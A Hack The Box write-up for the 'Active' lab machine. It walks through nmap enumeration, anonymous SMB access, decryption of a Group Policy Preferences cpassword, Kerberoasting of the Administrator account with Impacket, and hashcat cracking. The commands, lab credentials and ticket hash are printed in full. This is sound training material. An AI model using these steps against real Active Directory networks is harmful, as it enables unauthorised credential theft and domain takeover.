Hackthebox Writeup: Active
Output of nmap
:
# Nmap 7.94 scan initiated Mon Sep 4 17:39:56 2023 as: /usr/bin/nmap -sCV -p88,135,139,389,445,464,593,636,49152,49153,49154,49155,49157,49158 --open -oN nmap/Script_10.10.10.100.nmap --system-dns --stats-every 2s 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.022s latency).
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-04 15:40:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open unknown
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-09-04T15:40:56
|_ start_date: 2023-09-04T15:39:38
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 4 17:40:57 2023 -- 1 IP address (1 host up) scanned in 60.54 seconds
Using enum4linux-ng
, we find an SMB share which allows anonymous login:
$ smbclient.py -no-pass 10.10.10.100
While the Users
share is not accessible to us, we can access the Replication
share.
We see there is a single folder inside the share. We recursively download it using smbclient
.
In this directory, we find /Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
, which contains a cpassword
field, which can be decrypted easily.
$ python3 gpp-decrypt.py -f ~/htb/active/smb-replication/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18
With the obtained credentials, we can log in onto SMB as the user, and access the Users
share:
smbclient -U "active.htb/SVC_TGS%GPPstillStandingStrong2k18" //10.10.10.100/Users
We pull the entire Users
folder recursively, but there is nothing interesting inside.
Kerberoasting
This is a very useful cheat sheet when dealing with Active Directory boxes. You enter what you have (e.g., just username, username and password), the service you want to target, and it tells you what tools you are able to run. With this, I discovered I can start Kerberoasting.
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2023-09-04 17:40:44.644949
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$dc5d5dea8e316af3a5fbd129d8ea714b$ed52b53f9a90e76d433880b0ecbd829544004f442eda4ffd4097b121a2524dc4415b875a95767049804e0423361f4340992b1d23f547caa05243941954e5fbe8fae62517f0660f64f45059f0047c007b5612a472f8052ab37592f2056fc403b412cb85d34a45c6c2b88f75721bf25ea5867422666a3344890d5806a6a1480079433428454a515eba58f685010dcd8d2814e1553cd79253423b663e41141f9ecc168578651fde917fe1f1c75e57fcfab994593d76915537715f98791a739308055040fd8190df8de908f607719ff386d1958df3138e5c14dc7bd4200fc6ed18b6fe21c61e1f751bee4f9f8e919d3bdda9c60e46ec6dea412b919abd48fb8cf86393cd0cd5b17ba4e03f72dacd9b4182466abcd8bfc98c874594102950f78a7f8330996f1193717ecac946348359309786347544a51fe8aa69e69d5c775b75528a89bab46f90f31e032b88788130306247d981fa8c3b35e8aecea31bf1619134ffffd33e02f9736354aca1531940a451934898576c8f4761b35040e18c669f86db36b518fccb4da24425d73fd1e93e86b6b76d999a40f9d264bb5176e9f842fe4ffdfab8a64beeb767303fcfbc9e5b0c689f8b595c54ba729b89ddb0bcf0e628160d9228be4ec9c54deafc60f4500f62dfb7046bf5c1936840972919d67ee9dae23cfdf6c15e4608acf24c42c682058b6633f47050c4710712404d40291f4f83ffb6c40ba0b2d28428b95c7668d0d0c37194b4cf8555da4b416dd8231d7312334c2159d7fb800dc1de92f15cf35dd4d94627a374109c8b7e30744e524e6d2251597cb22596158e607574a50e6f22e5232c4d86a0e2d7920f29e3b340785b6f8908496f134c0b44679a2f64f5c60e66a204bb3260e6b7e0f2b08b40ff2ca2460fcc67fde4d0ae9a51c591a4c311390effb4850be09ba9e7af8d0df923df2af111f57e353d13bd9ccf2ffe37fc0229b110c38a509864da24a9618bf38ac02c41a3fee8210c88acb82b855fdf13856a049a346bf061892eb98edf2e736d0bbe269e264ea530760e4de3fd35a467fa4224023d289b1fcf9fec8c709a603e89b0c9a0b77d797e66edb43dcd8574a3a47656a82e99e65a71ebf0c68215cce5fc5322b9b76afe3fd176e1f737c2a0f368f9c36e564fcb1fa755f93c89cd45914f23e25fbe6841c8066899a45c05ff9d2bc40a4b89dc6a07cafb5b69af7f05b1945eba2a864ceb40e97f0b72a27d591f12779b38269edf9853cd9198eea3c0
We now have the hash of the Administrator, which we can crack using hashcat
:
$ hashcat -m 13100 --attack-mode 0 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt
Turns out the password is Ticketmaster1968
. We can now use SMB to get the root flag:
$ smbclient -U "active.htb/Administrator%Ticketmaster1968" //10.10.10.100/Users